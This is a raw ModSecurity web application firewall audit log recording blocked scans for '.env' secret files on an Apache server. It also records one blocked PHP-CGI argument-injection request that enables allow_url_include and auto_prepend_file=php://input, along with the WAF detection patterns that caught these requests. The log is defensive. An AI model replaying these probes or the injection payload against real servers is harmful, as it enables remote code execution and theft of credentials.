Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745242172518965 782 (- - -)
Stopwatch2: 1745242172518965 782; combined=338, p1=299, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--00d10509-Z--
--c0e2a625-A--
[21/Apr/2025:20:29:32 +0700] aAZIPJjcgo97ICfbW9NzDwAAABQ 103.236.140.4 34080 103.236.140.4 8181
--c0e2a625-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.106
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--c0e2a625-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c0e2a625-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745242172730484 757 (- - -)
Stopwatch2: 1745242172730484 757; combined=304, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c0e2a625-Z--
--0e62687d-A--
[21/Apr/2025:20:29:33 +0700] aAZIPZjcgo97ICfbW9NzEwAAABE 103.236.140.4 34102 103.236.140.4 8181
--0e62687d-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.106
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--0e62687d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0e62687d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745242173111821 715 (- - -)
Stopwatch2: 1745242173111821 715; combined=272, p1=237, p2=0, p3=0, p4=0, p5=34, sr=61, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0e62687d-Z--
--f0825a55-A--
[21/Apr/2025:20:45:54 +0700] aAZMEpjcgo97ICfbW9OCBgAAAAE 103.236.140.4 58522 103.236.140.4 8181
--f0825a55-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 172.98.33.75
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 172.98.33.75
X-Forwarded-Proto: http
Connection: close
User-Agent: python-requests/2.32.3
Accept: */*
--f0825a55-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0825a55-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745243154312607 712 (- - -)
Stopwatch2: 1745243154312607 712; combined=245, p1=216, p2=0, p3=0, p4=0, p5=29, sr=55, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0825a55-Z--
--fc307a07-A--
[21/Apr/2025:22:46:31 +0700] aAZoV3gNnYly62OFre4UkgAAAEM 103.236.140.4 46940 103.236.140.4 8181
--fc307a07-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 2.58.56.225
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 2.58.56.225
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--fc307a07-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fc307a07-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745250391210483 1075 (- - -)
Stopwatch2: 1745250391210483 1075; combined=422, p1=380, p2=0, p3=0, p4=0, p5=42, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fc307a07-Z--
--43dc772f-A--
[21/Apr/2025:23:35:06 +0700] aAZzunfk8_rbvOkGr1q3aAAAAIA 103.236.140.4 60772 103.236.140.4 8181
--43dc772f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 128.199.133.65
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 128.199.133.65
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--43dc772f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43dc772f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745253306287474 598 (- - -)
Stopwatch2: 1745253306287474 598; combined=220, p1=192, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43dc772f-Z--
--6bbaa35b-A--
[22/Apr/2025:01:27:14 +0700] aAaOAngNnYly62OFre6zWgAAAEE 103.236.140.4 48472 103.236.140.4 8181
--6bbaa35b-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.17
X-Forwarded-Proto: http
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--6bbaa35b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6bbaa35b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745260034769531 761 (- - -)
Stopwatch2: 1745260034769531 761; combined=320, p1=285, p2=0, p3=0, p4=0, p5=35, sr=64, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6bbaa35b-Z--
--ceb8ea0a-A--
[22/Apr/2025:01:27:18 +0700] aAaOBngNnYly62OFre6zZAAAAEk 103.236.140.4 48648 103.236.140.4 8181
--ceb8ea0a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.134.17
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.134.17
X-Forwarded-Proto: https
Connection: close
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
Accept: */*
--ceb8ea0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ceb8ea0a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745260038248135 817 (- - -)
Stopwatch2: 1745260038248135 817; combined=346, p1=301, p2=0, p3=0, p4=0, p5=45, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ceb8ea0a-Z--
--efe50865-A--
[22/Apr/2025:02:53:14 +0700] aAaiKqLIR8aniCwJv2WoTQAAAMk 103.236.140.4 58634 103.236.140.4 8181
--efe50865-B--
GET /env/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--efe50865-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--efe50865-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265194824381 748 (- - -)
Stopwatch2: 1745265194824381 748; combined=272, p1=235, p2=0, p3=0, p4=0, p5=37, sr=63, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--efe50865-Z--
--40c0d846-A--
[22/Apr/2025:02:53:15 +0700] aAaiK6LIR8aniCwJv2WoTwAAAMY 103.236.140.4 58672 103.236.140.4 8181
--40c0d846-B--
GET /favs/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--40c0d846-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--40c0d846-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265195514545 623 (- - -)
Stopwatch2: 1745265195514545 623; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--40c0d846-Z--
--da0be70b-A--
[22/Apr/2025:02:53:16 +0700] aAaiLHgNnYly62OFre7ysAAAAEA 103.236.140.4 58706 103.236.140.4 8181
--da0be70b-B--
GET /.env.save HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--da0be70b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--da0be70b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265196218385 774 (- - -)
Stopwatch2: 1745265196218385 774; combined=305, p1=269, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--da0be70b-Z--
--65019676-A--
[22/Apr/2025:02:53:16 +0700] aAaiLHfk8_rbvOkGr1pkuwAAAIc 103.236.140.4 58748 103.236.140.4 8181
--65019676-B--
GET /core/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--65019676-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--65019676-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265196905164 868 (- - -)
Stopwatch2: 1745265196905164 868; combined=436, p1=398, p2=0, p3=0, p4=0, p5=38, sr=116, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--65019676-Z--
--5437d05d-A--
[22/Apr/2025:02:53:17 +0700] aAaiLXfk8_rbvOkGr1pkwwAAAI8 103.236.140.4 58786 103.236.140.4 8181
--5437d05d-B--
GET /cgi-bin/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--5437d05d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5437d05d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265197600837 743 (- - -)
Stopwatch2: 1745265197600837 743; combined=322, p1=287, p2=0, p3=0, p4=0, p5=34, sr=111, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5437d05d-Z--
--7502ca7b-A--
[22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoVQAAAMo 103.236.140.4 58820 103.236.140.4 8181
--7502ca7b-B--
GET /content/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--7502ca7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7502ca7b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265198304403 775 (- - -)
Stopwatch2: 1745265198304403 775; combined=320, p1=279, p2=0, p3=0, p4=0, p5=41, sr=72, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7502ca7b-Z--
--4a79de63-A--
[22/Apr/2025:02:53:18 +0700] aAaiLqLIR8aniCwJv2WoWAAAAM0 103.236.140.4 58866 103.236.140.4 8181
--4a79de63-B--
GET /custom/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 195.178.110.157
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 195.178.110.157
X-Forwarded-Proto: https
Connection: close
User-Agent: l9explore/1.2.2
--4a79de63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4a79de63-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745265198996102 648 (- - -)
Stopwatch2: 1745265198996102 648; combined=239, p1=211, p2=0, p3=0, p4=0, p5=28, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4a79de63-Z--
--d205c757-A--
[22/Apr/2025:03:53:23 +0700] aAawQ19gRrTzIZGIAflDmgAAAJI 103.236.140.4 44722 103.236.140.4 8181
--d205c757-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 128.199.20.147
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 128.199.20.147
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--d205c757-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d205c757-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745268803214051 922 (- - -)
Stopwatch2: 1745268803214051 922; combined=401, p1=363, p2=0, p3=0, p4=0, p5=37, sr=124, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d205c757-Z--
--80613c45-A--
[22/Apr/2025:05:45:57 +0700] aAbKpV9gRrTzIZGIAflNiQAAAIw 103.236.140.4 37066 103.236.140.4 8181
--80613c45-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 45.144.212.120
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 45.144.212.120
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
--80613c45-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80613c45-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745275557531826 899 (- - -)
Stopwatch2: 1745275557531826 899; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80613c45-Z--
--e2de2c4a-A--
[22/Apr/2025:05:46:33 +0700] aAbKya3OiIHZ_gUDzTtlgwAAAM0 103.236.140.4 38960 103.236.140.4 8181
--e2de2c4a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3542.0 Safari/537.36
Accept-Charset: utf-8
--e2de2c4a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e2de2c4a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745275593144333 699 (- - -)
Stopwatch2: 1745275593144333 699; combined=301, p1=270, p2=0, p3=0, p4=0, p5=31, sr=100, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e2de2c4a-Z--
--8c8c8e43-A--
[22/Apr/2025:06:08:48 +0700] aAbQAM0DNRaK3AYHswK10AAAAAw 103.236.140.4 53790 103.236.140.4 8181
--8c8c8e43-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.144
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.144
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 8.1.0; zh-CN; EML-AL00 Build/HUAWEIEML-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 baidu.sogo.uc.UCBrowser/11.9.4.974 UWS/2.13.1.48 Mobile Safari/537.36 AliApp(DingTalk/4.5.11) com.alibaba.android.rimet/10487439 Channel/227200 language/zh-CN
Accept-Charset: utf-8
--8c8c8e43-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8c8c8e43-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745276928326370 900 (- - -)
Stopwatch2: 1745276928326370 900; combined=392, p1=353, p2=0, p3=0, p4=0, p5=39, sr=151, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8c8c8e43-Z--
--fb845f6d-A--
[22/Apr/2025:08:05:57 +0700] aAbrdc0DNRaK3AYHswIYOAAAABY 103.236.140.4 36284 103.236.140.4 8181
--fb845f6d-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--fb845f6d-C--
--fb845f6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fb845f6d-E--
--fb845f6d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745283957746041 4796 (- - -)
Stopwatch2: 1745283957746041 4796; combined=3638, p1=549, p2=3046, p3=0, p4=0, p5=43, sr=75, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fb845f6d-Z--
--3be0f011-A--
